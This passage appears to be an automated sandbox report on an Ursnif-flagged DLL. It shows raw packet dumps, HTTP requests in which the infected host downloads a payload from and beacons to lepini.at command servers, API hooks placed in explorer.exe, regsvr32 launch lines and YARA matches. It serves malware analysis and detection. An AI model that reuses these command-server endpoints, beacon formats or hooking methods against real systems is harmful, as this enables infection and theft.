20 88 95 3c 3c 66 1c 12 d8 9f 8e cd 93 47 d0 b6 47 a6 5b 04 6f 4d d2 8b 2f cf c7 e4 84 5d 76 cd cc af 49 1e d7 6c b8 90 2b 8d 5d a1 d9 c6 fa dd 05 61 75 4a 98 d3 fd 73 72 8d 75 74 4f fa 17 62 27 63 f7 72 0f 18 74 fd 12 89 50 ca 7f 95 5e cd b5 30 ed 73 02 4d ec 8d 0e fd 6a 8f 0f da 19 f4 c1 29 eb 63 52 47 f1 ce 75 99 1f a8 ab b7 5d e0 01 7b 63 e8 a3 2a 8a 29 e0 2c ab fb a8 d5 b7 a0 1b 15 fd a7 ad 41 18 48 22 e2 d4 38 f9 9c 35 fc 68 a4 a6 73 e4 17 a6 16 e5 90 0a 7c e9 12 c4 d4 42 af 20 53 e5 0d 82 c1 75 23 a0 da 29 78 00 6c 96 a6 b6 f0 b2 79 50 06 8b 8d 2e 02 32 5d 59 db de 2a 32 51 3b 0f f5 98 d5 90 e7 2c 7f 06 f2 ea 77 56 4b 3d 0a a4 93 d9 56 ad c5 34 a9 de 9d 38 55 c9 0a 16 a6 fe 75 f3 6e 90 f4 ec 0d 36 62 44 46 cb c3 58 ac 57 f0 99 73 4d da be 94 43 fe b3 08 9c 2e e9 a7 a1 d7 81 0c 6a ef e0 04 38 67 b6 ca 8b 92 ac e9 da 9e da 9b 01 31 84 4c e0 20 e9 ea c0 df 5e a6 72 73 1b a0 2f 9d 2e cc ce 52 45 79 86 4d b4 30 84 ce c2 4a ee a4 ba b5 15 ce f4 61 a3 d3 79 43 24 bf 0f 43 7c ff c0 cc 2b 95 da dc cb 22 a5 92 42 4d 22 3a 81 36 29 0b 65 c7 aa 04 c9 2a 2b b0 64 0f 11 06 cc ba 7e be df 28 6e 54 a5 32 6c 65 68 e7 f9 07 6e 08 80 ea 46 14 a1 19 01 c9 3c 88 40 2b b0 05 d6 aa 94 1b 6a a7 ab ce e4 84 d8 5c be ce df 6d 1c 47 d8 88 00 c1 81 61 93 7c dc 1d c0 25 b1 8a 12 5c 2b af c4 07 a2 d2 d9 6f 70 2d ff 42 85 e4 9f 43 10 83 a9 d9 91 44 72 12 00 65 f4 0f f9 5b c1 46 b7 42 8c 2c 85 17 d5 a5 c2 60 d0 68 fa 83 d4 c6 c5 a4 05 25 0a aa c0 bc 66 ae 9b d3 f8 8b 2e c1 d9 f3 88 fe cb 5e 25 25 e6 3b 24 51 9d e8 57 11 cc 97 43 ed 62 f3 e7 14 a5 ed 3a 78 b9 0b 64 e9 9a 69 a9 ac 80 4c fb d4 7a 6c 4d bf a6 fe a8 be 6d 94 af 0e 84 13 96 c0 1f 95 3f 35 51 33 8d bf 4e 40 d7 d6 a8 5a d1 a6 ab 93 ac af 5d ed 9c 3b 0a f3 1b f8 9e 05 c0 5a 81 8e 5f a3 ff 42 38 c4 15 8e f4 c5 f4 84 12 a3 0f ae 1c 79 5f 55 04 71 ab 16 86 04 b5 26 45 c1 1e f1 0c d3 6d 93 da 34 92 07 29 0f 7d f3 b1 f0 42 0c 74 23 e1 07 09 aa 17 e3 3a 76 23 0c 27 41 95 44 1b cc c0 6c b1 67 1c 49 a3 fd 27 48 25 64 b9 21 aa 4b a5 07 b1 fe ca 41 9c 84 f4 bd 6d 51 c8 04 17 f0 51 73 39 51 2e 39 77 0f 2b f9 78 55 85 fe 06 3a 57 c8 b2 aa 51 1a bf b1 b6 f5 9c 21 0b fe 10 47 5d 37 d1 ca a3 c0 65 27 b8 4c 75 4f d1 c8 ac f3 9c 92 f6 09 86 93 59 48 bc 93 36 32 ab 8a de 24 16 3a fa cb 81 c4 5f 96 b7 ed f2 18 89 8f d0 9a 35 54 d6 57 2c 56 60 5c 98 bf 0e 12 af d4 7d 88 2e 5b 63 f9 c6 20 c6 93
Data Ascii: 76c5CD[3I$wI0_TvfWmO]E>-xw4gQc*g~5ira{duSNN&Zn|:Unj>==M6,k5g2pb8z6R$PG6[1o@-AAOke%q <<fGG[oM/]vIl+]auJsrutOb'crtP^0sMj)cRGu]{c*),AH"85hs|B Su#)xlyP.2]Y*2Q;,wVK=V48Uun6bDFXWsMC.j8g1L ^rs/.REyM0JayC$C|+"BM":6)e*+d~(nT2lehnF<@+j\mGa|%\+op-BCDre[FB,`h%f.^%%;$QWCb:xdiLzlMm?5Q3N@Z];Z_B8y_Uq&Em4)}Bt#:v#'ADlgI'H%d!KAmQQs9Q.9w+xU:WQ!G]7e'LuOYH62$:_5TW,V`\}.[c


Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49772 | Destination IP: 34.65.144.159 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Feb 15, 2021 21:27:39.873075008 CET | kBytes transferred: 8565 | Direction: OUT
Data:
GET /jvassets/xI/t64.dat HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: c56.lepini.at

Timestamp: Feb 15, 2021 21:27:39.998234034 CET | kBytes transferred: 8567 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:27:39 GMT
Content-Type: application/octet-stream
Content-Length: 138820
Last-Modified: Mon, 28 Oct 2019 09:43:42 GMT
Connection: close
ETag: "5db6b84e-21e44"
Accept-Ranges: bytes
Data Raw: 17 45 7e 72 ac 5b ed 66 e1 de 31 9e 70 18 b7 1a 77 c0 be b3 e2 43 ff 7c d8 16 7f 6f 35 a2 d1 a5 d2 ec 0d 0c de 58 84 1a f3 53 04 f0 65 cb 76 1f 35 85 a0 7d 1d f2 44 63 de 89 f3 f1 eb d3 60 21 68 3d 3a 93 e1 55 94 db 4c d2 f2 b4 3e 34 48 eb e8 47 7b 53 14 54 86 87 a3 d2 0d 55 0c d0 4f 6f 51 73 eb e2 f9 f4 9b f0 49 af 3d a0 bd ba 48 52 29 a2 84 33 75 9e 48 16 a7 b3 00 58 91 bf bf ea 49 85 ff c7 58 36 df 5b 13 ec c2 c6 92 56 72 82 53 68 a1 ca a8 33 3e e7 8b 8e 6f fa 4b 85 a0 7f bb 5c de 12 c3 97 40 27 18 f2 b2 95 91 d8 b7 45 cf 2a 5f 95 76 5b fc 02 c1 9d d7 e5 7f ee ec f5 a0 52 7b 4d 4d ae da 70 b4 71 95 b6 39 2e 38 47 c0 ab 5e fe cf a1 6a 5c a5 3c 8f 1b 97 0a 2a 41 5f 6e 2e 85 b4 8e 24 d6 6a 1c cb 43 8c ca 75 7d 09 57 73 3c a2 b8 0b 18 00 21 c1 f5 fc e4 2b 04 14 51 c3 36 ea 80 55 0a 28 82 e4 56 51 91 99 bf 11 ae 36 06 cd 81 44 e0 ad db 69 d6 8e 24 28 ee 4c 0d 81 69 8b 96 c0 52 cd ed ec 31 e8 7f 08 d8 ff 0a 82 4d 1d fa a0 28 3c 3f 5f 53 cb 64 ea 5d 7c c7 f0 0f 28 71 5a f4 60 b7 7b f3 e1 19 5b 7b be d1 62 af ef 2f ad 3b 22 a8 03 e7 9f 3d e5 da ca 8b 1a 9c 2c fd 76 89 a9 f7 a5 7b 6a b4 47 62 bf 64 5d 54 26 01 9a 1d 3b b0 97 db c5 c1 dd 94 52 d0 b2 77 e0 f7 00 8d c1 99 02 69 f4 b2 87 b2 0c 68 b3 9d b6 e6 a6 9f 58 b0 52 f8 5e b5 ac 1e 36 41 bd bc f9 5d 3a 2b 5a 40 60 9a 48 c1 b3 4a df cc 81 65 53 4e e4 9a 80 8b dd 8f 43 eb 11 23 73 1b 1b c1 99 89 21 94 4c a5 84 c3 13 96 ad 5d 82 20 a4 a4 3b dd 1e 43 74 c6 42 11 7a 8a f2 93 8b 7e 24 73 17 d9 c7 eb 47 18 47 41 4f a2 f1 bc 52 cc 35 f2 c2 73 3e e5 32 8a b5 c7 7c 3b d4 88 bd aa 47 48 66 2e 00 bd 3f fc 08 b4 49 98 e3 36 db f0 33 4c 40 2b cc 59 2a b5 ba 73 58 27 de a0 31 0e 6d 63 70 19 7b 5f 67 00 54 79 89 7f 42 21 df 6e 23 e1 54 43 4a 09 00 77 ac fb e4 2e a8 6d 07 21 b3 a0 98 ad 40 d2 34 64 c9 c2 62 14 7c 45 eb a0 65 98 c1 18 a1 6a af 69 0a a2 bb 50 42 96 c1 d7 02 58 6d f4 b1 15 90 f6 50 9c 6a fd d4 2e 5e a7 4a cb 67 59 63 74 77 99 de e0 c0 d5 5c 9d a7 89 1b 90 39 29 23 21 3b c4 35 f1 49 9e 67 f3 ce fe 1d 0a 67 69 06 13 13 30 ab e6 c6 f4 c9 7e 94 48 5b a1 f7 5f 27 1f 03 ac 85 e1 0e b1 bf 6e e1 1c 5a 24 cc b2 53 fd 61 58 e3 87 0b 85 9e 03 94 f6 2a bd 92 53 09 77 f8 5e d3 c9 b7 19 42 4e e6 2a 67 af 27 4e 01 de 6a fc 1e 82 0c 7e 45 7b e8 1d 97 82 9b 5c 14 96 d2 82 dd 53 15 1e 84 41 01 4f 0f 32 ac ee b7 85 96 4c e9 dc b0 42 3c 93 a6 0b a3 79 cb 7b 2c d1 21 6f c1 6a 38 48 d7 37 8f 35 b8 1d 7a e7 eb 63 bc 4e 6b b6 23 aa 9c fd 32 03 46 e2 37 47 49 c2 35 a1 48 7e 98 49 6a b4 98 e7 cb 33 dd 1a be 5a c8 ea a7 44 33 9b e3 a6 84 da 68 ec bf 93 03 88 f9 6e 02 17 a6 96 46 ad ae 25 c2 bb 97 7a 57 35 aa 0a 42 b5 c3 8a 35 af 20 1b 1a b9 c6 99 99 8a b2 b6 46 1c 70 a0 53 c2 e9 a2 e6 ad a4 8f d5 11 da 74 60 13 7c 55 4d 42 1c c6 a4 47 a8 4e 27 67 a4 37 b3 0e ca f5 b1 9a a5 de e3 07 25 55 07 ff 18 b3 17 44 8b a0 af e3 f5 ff 75 b8 f2 2b 4d 9e f9 ad 07 c0 5e d7 1b ab 81 e4 99 93 ac a9 63 2f 4e 27 18 d0 dd 29 f7 28 98 b1 c3 5e 52 9e d4 01 1b 9f ba 6d 7d 24 b8 cc 84 0e 03 07 2e 3a ba b5 ad 8b ae 57 ce 78 7b aa 0f 07 5f ee 2a 4a 6b 0d f8 40 bb 79 91 71 5d ae 1b 1d 3c bf b9 e2 9b d4 4c 6c 52 55 e3 59 22 40 9a 6f cc 9a 14 bb 63 ad 00 8f bf cd 7b ca 18 ce c6 df 21 08 86 ed 93 17 79 b7 6d 89 0c ba 64 8a 93 dd fa 1b 07 69 84 31 87 f9 ae 59 a4 f8 ed 03 62 6f 2a fa 54 99 38 81 d4 e3 dc e8 39 d4 b0 62 81 c2 49 a1
Data Ascii: E~r[f1pwC|o5XSev5}Dc`!h=:UL>4HG{STUOoQsI=HR)3uHXIX6[VrSh3>oK\@'E*_v[R{MMpq9.8G^j\<*A_n.$jCu}Ws<!+Q6U(VQ6Di$(LiR1M(<?_Sd]|(qZ`{[{b/;"=,v{jGbd]T&;RwihXR^6A]:+Z@`HJeSNC#s!L] ;CtBz~$sGGAOR5s>2|;GHf.?I63L@+Y*sX'1mcp{_gTyB!n#TCJw.m!@4db|EejiPBXmPj.^JgYctw\9)#!;5Iggi0~H[_'nZ$SaX*Sw^BN*g'Nj~E{\SAO2LB<y{,!oj8H75zcNk#2F7GI5H~Ij3ZD3hnF%zW5B5 FpSt`|UMBGN'g7%UDu+M^c/N')(^Rm}$.:Wx{_*Jk@yq]<LlRUY"@oc{!ymdi1Ybo*T89bI


Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49773 | Destination IP: 34.65.144.159 | Destination Port: 80 | Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Feb 15, 2021 21:27:49.780139923 CET | kBytes transferred: 8784 | Direction: OUT
Data:
GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Host: api3.lepini.at

Timestamp: Feb 15, 2021 21:27:50.445771933 CET | kBytes transferred: 8784 | Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:27:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
7           192.168.2.5  49774        34.65.144.159   80                C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Feb 15, 2021 21:27:50.736696959 CET
kBytes transferred: 8789
Direction: OUT
Data:
POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Content-Length: 2
Host: api3.lepini.at

Timestamp: Feb 15, 2021 21:27:51.290230989 CET
kBytes transferred: 8791
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:27:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Data Raw: 37 37 0d 0a 8d 87 1d d8 f1 f6 56 18 d6 06 ac 96 e6 02 31 13 0c 4c 71 ae 76 5d 86 ad 65 61 3c 10 dd e4 a2 09 e8 e8 bc ba 5b 50 c0 53 3b 32 2b 69 39 b6 10 2a 09 d4 23 26 4d 48 07 7a d8 78 b7 5d 11 11 d6 52 f5 cc 40 24 2d 87 fe a1 d1 2a 1c d3 73 99 b2 06 b5 11 54 b0 56 46 db 3b 41 13 c7 6c ee 0c e3 85 02 bc c6 a6 c0 3d 1e e0 07 79 99 ab a6 cf 5e 3f 26 d2 73 9f 87 0d 0e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 77V1Lqv]ea<[PS;2+i9*#&MHzx]R@$-*sTVF;Al=y^?&s0


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
8           192.168.2.5  49775        34.65.144.159   80                C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp: Feb 15, 2021 21:27:51.945363045 CET
kBytes transferred: 8792
Direction: OUT
Data:
GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Host: api3.lepini.at

Timestamp: Feb 15, 2021 21:27:52.335773945 CET
kBytes transferred: 8793
Direction: IN
Data:
HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Feb 2021 20:27:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Strict-Transport-Security: max-age=63072000; includeSubdomains
X-Content-Type-Options: nosniff
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


HTTPS Packets

Timestamp: Feb 15, 2021 21:26:09.842351913 CET
Source IP: 104.20.184.68
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49732
Subject: CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US
Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Not Before: Fri Feb 12 01:00:00 CET 2021
Not After: Sat Feb 12 00:59:59 CET 2022
Issuer certificate Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Issuer certificate Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Issuer certificate Not Before: Mon Jan 27 13:48:08 CET 2020
Issuer certificate Not After: Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:09.843595028 CET
Source IP: 104.20.184.68
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49733
Subject: CN=onetrust.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US
Issuer: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Not Before: Fri Feb 12 01:00:00 CET 2021
Not After: Sat Feb 12 00:59:59 CET 2022
Issuer certificate Subject: CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US
Issuer certificate Issuer: CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IE
Issuer certificate Not Before: Mon Jan 27 13:48:08 CET 2020
Issuer certificate Not After: Wed Jan 01 00:59:59 CET 2025
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:16.632045031 CET
Source IP: 151.101.1.44
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49749
Subject: CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US
Issuer: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Not Before: Wed Nov 25 01:00:00 CET 2020
Not After: Mon Dec 27 00:59:59 CET 2021
Issuer certificate Subject: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Issuer certificate Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer certificate Not Before: Thu Sep 24 02:00:00 CEST 2020
Issuer certificate Not After: Tue Sep 24 01:59:59 CEST 2030
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:16.747270107 CET
Source IP: 151.101.1.44
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49747
Subject: CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US
Issuer: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Not Before: Wed Nov 25 01:00:00 CET 2020
Not After: Mon Dec 27 00:59:59 CET 2021
Issuer certificate Subject: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Issuer certificate Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer certificate Not Before: Thu Sep 24 02:00:00 CEST 2020
Issuer certificate Not After: Tue Sep 24 01:59:59 CEST 2030
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:16.959656000 CET
Source IP: 151.101.1.44
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49751
Subject: CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US
Issuer: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Not Before: Wed Nov 25 01:00:00 CET 2020
Not After: Mon Dec 27 00:59:59 CET 2021
Issuer certificate Subject: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Issuer certificate Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer certificate Not Before: Thu Sep 24 02:00:00 CEST 2020
Issuer certificate Not After: Tue Sep 24 01:59:59 CEST 2030
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:16.960663080 CET
Source IP: 151.101.1.44
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49746
Subject: CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US
Issuer: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Not Before: Wed Nov 25 01:00:00 CET 2020
Not After: Mon Dec 27 00:59:59 CET 2021
Issuer certificate Subject: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Issuer certificate Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer certificate Not Before: Thu Sep 24 02:00:00 CEST 2020
Issuer certificate Not After: Tue Sep 24 01:59:59 CEST 2030
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:17.004138947 CET
Source IP: 151.101.1.44
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49748
Subject: CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US
Issuer: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Not Before: Wed Nov 25 01:00:00 CET 2020
Not After: Mon Dec 27 00:59:59 CET 2021
Issuer certificate Subject: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Issuer certificate Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer certificate Not Before: Thu Sep 24 02:00:00 CEST 2020
Issuer certificate Not After: Tue Sep 24 01:59:59 CEST 2030
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Timestamp: Feb 15, 2021 21:26:17.081238985 CET
Source IP: 151.101.1.44
Source Port: 443
Dest IP: 192.168.2.5
Dest Port: 49750
Subject: CN=*.taboola.com, O="Taboola, Inc", L=New York, ST=New York, C=US
Issuer: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Not Before: Wed Nov 25 01:00:00 CET 2020
Not After: Mon Dec 27 00:59:59 CET 2021
Issuer certificate Subject: CN=DigiCert TLS RSA SHA256 2020 CA1, O=DigiCert Inc, C=US
Issuer certificate Issuer: CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US
Issuer certificate Not Before: Thu Sep 24 02:00:00 CEST 2020
Issuer certificate Not After: Tue Sep 24 01:59:59 CEST 2030
JA3 SSL Client Fingerprint: 771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0
JA3 SSL Client Digest: 9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

User Modules

Hook Summary

Function Name                                                     Hook Type  Active in Processes
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW          IAT        explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW                  IAT        explorer.exe
CreateProcessAsUserW                                              EAT        explorer.exe
CreateProcessAsUserW                                              INLINE     explorer.exe
CreateProcessW                                                    EAT        explorer.exe
CreateProcessW                                                    INLINE     explorer.exe
CreateProcessA                                                    EAT        explorer.exe
CreateProcessA                                                    INLINE     explorer.exe

Processes

Process: explorer.exe, Module: WININET.dll
Function Name                                                     Hook Type  New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW          IAT        7FFA9B335200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW                  IAT        721719C

Process: explorer.exe, Module: user32.dll
Function Name                                                     Hook Type  New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW          IAT        7FFA9B335200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW                  IAT        721719C

Process: explorer.exe, Module: KERNEL32.DLL
Function Name                                                     Hook Type  New Data
CreateProcessAsUserW                                              EAT        7FFA9B33521C
CreateProcessAsUserW                                              INLINE     0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW                                                    EAT        7FFA9B335200
CreateProcessW                                                    INLINE     0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA                                                    EAT        7FFA9B33520E
CreateProcessA                                                    INLINE     0xFF 0xF2 0x25 0x50 0x00 0x00

Statistics

Behavior


System Behavior

General

Start time: 21:26:02
Start date: 15/02/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\NJPcHPuRcG.dll'
Imagebase: 0xc80000
File size: 121856 bytes
MD5 hash: 8081BC925DFC69D40463079233C90FA5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 21:26:02
Start date: 15/02/2021
Path: C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit): true
Commandline: regsvr32.exe /s C:\Users\user\Desktop\NJPcHPuRcG.dll
Imagebase: 0x230000
                                                                                                                                                                                                    File size:20992 bytes
                                                                                                                                                                                                    MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328188279.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328320558.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328226726.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328337032.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328359150.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328350143.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328266588.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.328300905.0000000004F38000.00000004.00000040.sdmp, Author: Joe Security
